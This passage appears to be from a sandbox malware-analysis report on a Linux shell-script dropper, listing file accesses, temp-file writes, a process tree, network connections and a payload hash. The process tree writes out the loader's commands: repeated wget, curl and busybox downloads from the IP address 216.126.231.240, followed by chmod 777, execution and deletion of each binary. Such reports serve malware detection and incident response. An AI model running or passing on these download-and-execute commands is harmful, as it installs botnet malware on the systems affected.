| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 | /usr/bin/curl | N/A |
Processes
/tmp/5e1c33ea279105c302ec4665ddd72c155d9d440ae2c473b803df701c30002518.sh
[/tmp/5e1c33ea279105c302ec4665ddd72c155d9d440ae2c473b803df701c30002518.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/bin/chmod
[chmod 777 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
[./25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/bin/rm
[rm 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/usr/bin/wget
[wget http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/bin/chmod
[chmod 777 UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5
[./UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/bin/rm
[rm UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/usr/bin/wget
[wget http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/bin/chmod
[chmod 777 Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX
[./Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/bin/rm
[rm Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/usr/bin/wget
[wget http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/bin/chmod
[chmod 777 kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW
[./kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/bin/rm
[rm kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/usr/bin/wget
[wget http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/bin/chmod
[chmod 777 l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI
[./l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/bin/rm
[rm l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/usr/bin/wget
[wget http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/bin/chmod
[chmod 777 6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE
[./6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/bin/rm
[rm 6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/usr/bin/wget
[wget http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/bin/chmod
[chmod 777 U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC
[./U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/bin/rm
[rm U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/usr/bin/wget
[wget http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/bin/chmod
[chmod 777 vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz
[./vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/bin/rm
[rm vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/usr/bin/wget
[wget http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/bin/chmod
[chmod 777 zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6
[./zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/bin/rm
[rm zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/usr/bin/wget
[wget http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |